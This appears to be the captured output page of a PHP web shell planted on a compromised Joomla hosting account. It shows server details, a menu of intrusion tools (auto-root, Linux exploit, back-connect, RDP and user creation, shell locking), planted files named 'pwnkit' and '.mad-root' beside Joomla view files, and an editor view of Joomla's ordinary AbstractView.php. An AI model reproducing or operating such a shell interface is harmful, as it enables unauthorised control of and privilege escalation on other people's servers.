Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
libraries /
src /
MVC /
View /
[ HOME SHELL ]
Name
Size
Permission
Action
Event
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AbstractView.php
5.69
KB
-rw----r--
CategoriesView.php
2.77
KB
-rw----r--
CategoryFeedView.php
4.08
KB
-rw----r--
CategoryView.php
7.79
KB
-rw----r--
FormView.php
5.16
KB
-rw----r--
GenericDataException.php
434
B
-rw----r--
HtmlView.php
14.65
KB
-rw----r--
JsonApiView.php
7.03
KB
-rw----r--
JsonView.php
2.65
KB
-rw----r--
ListView.php
6.02
KB
-rw----r--
ViewInterface.php
893
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AbstractView.php
<?php /** * Joomla! Content Management System * * @copyright (C) 2005 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\CMS\MVC\View; \defined('JPATH_PLATFORM') or die; use Joomla\CMS\Document\Document; use Joomla\CMS\Language\Text; use Joomla\CMS\MVC\Model\BaseDatabaseModel; use Joomla\CMS\Object\CMSObject; /** * Base class for a Joomla View * * Class holding methods for displaying presentation data. * * @since 2.5.5 */ abstract class AbstractView extends CMSObject implements ViewInterface { /** * The active document object * * @var Document * @since 3.0 */ public $document; /** * The URL option for the component. It is usually passed by controller while it creates the view * * @var string * @since 3.0 */ protected $option = null; /** * The name of the view * * @var array * @since 3.0 */ protected $_name = null; /** * Registered models * * @var array * @since 3.0 */ protected $_models = array(); /** * The default model * * @var string * @since 3.0 */ protected $_defaultModel = null; /** * Constructor * * @param array $config A named configuration array for object construction. * name: the name (optional) of the view (defaults to the view class name suffix). * charset: the character set to use for display * escape: the name (optional) of the function to use for escaping strings * base_path: the parent path (optional) of the views directory (defaults to the component folder) * template_plath: the path (optional) of the layout directory (defaults to base_path + /views/ + view name * helper_path: the path (optional) of the helper files (defaults to base_path + /helpers/) * layout: the layout (optional) to use to display the view * * @since 3.0 */ public function __construct($config = array()) { // Set the view name if (empty($this->_name)) { if (\array_key_exists('name', $config)) { $this->_name = $config['name']; } else { $this->_name = $this->getName(); } } // Set the component name if passed if (!empty($config['option'])) { $this->option = $config['option']; } } /** * Execute and display a template script. * * @param string $tpl The name of the template file to parse; automatically searches through the template paths. * * @return void * * @since 3.0 */ abstract public function display($tpl = null); /** * Method to get data from a registered model or a property of the view * * @param string $property The name of the method to call on the model or the property to get * @param string $default The name of the model to reference or the default value [optional] * * @return mixed The return value of the method * * @since 3.0 */ public function get($property, $default = null) { // If $model is null we use the default model if ($default === null) { $model = $this->_defaultModel; } else { $model = strtolower($default); } // First check to make sure the model requested exists if (isset($this->_models[$model])) { // Model exists, let's build the method name $method = 'get' . ucfirst($property); // Does the method exist? if (method_exists($this->_models[$model], $method)) { // The method exists, let's call it and return what we get return $this->_models[$model]->$method(); } } // Degrade to CMSObject::get return parent::get($property, $default); } /** * Method to get the model object * * @param string $name The name of the model (optional) * * @return BaseDatabaseModel The model object * * @since 3.0 */ public function getModel($name = null) { if ($name === null) { $name = $this->_defaultModel; } return $this->_models[strtolower($name)]; } /** * Method to add a model to the view. We support a multiple model single * view system by which models are referenced by classname. A caveat to the * classname referencing is that any classname prepended by \JModel will be * referenced by the name without \JModel, eg. \JModelCategory is just * Category. * * @param BaseDatabaseModel $model The model to add to the view. * @param boolean $default Is this the default model? * * @return BaseDatabaseModel The added model. * * @since 3.0 */ public function setModel($model, $default = false) { $name = strtolower($model->getName()); $this->_models[$name] = $model; if ($default) { $this->_defaultModel = $name; } return $model; } /** * Method to get the view name * * The model name by default parsed using the classname, or it can be set * by passing a $config['name'] in the class constructor * * @return string The name of the model * * @since 3.0 * @throws \Exception */ public function getName() { if (empty($this->_name)) { $reflection = new \ReflectionClass($this); if ($viewNamespace = $reflection->getNamespaceName()) { $pos = strrpos($viewNamespace, '\\'); if ($pos !== false) { $this->_name = strtolower(substr($viewNamespace, $pos + 1)); } } else { $className = \get_class($this); $viewPos = strpos($className, 'View'); if ($viewPos != false) { $this->_name = strtolower(substr($className, $viewPos + 4)); } } if (empty($this->_name)) { throw new \Exception(Text::sprintf('JLIB_APPLICATION_ERROR_GET_NAME', __METHOD__), 500); } } return $this->_name; } }
Close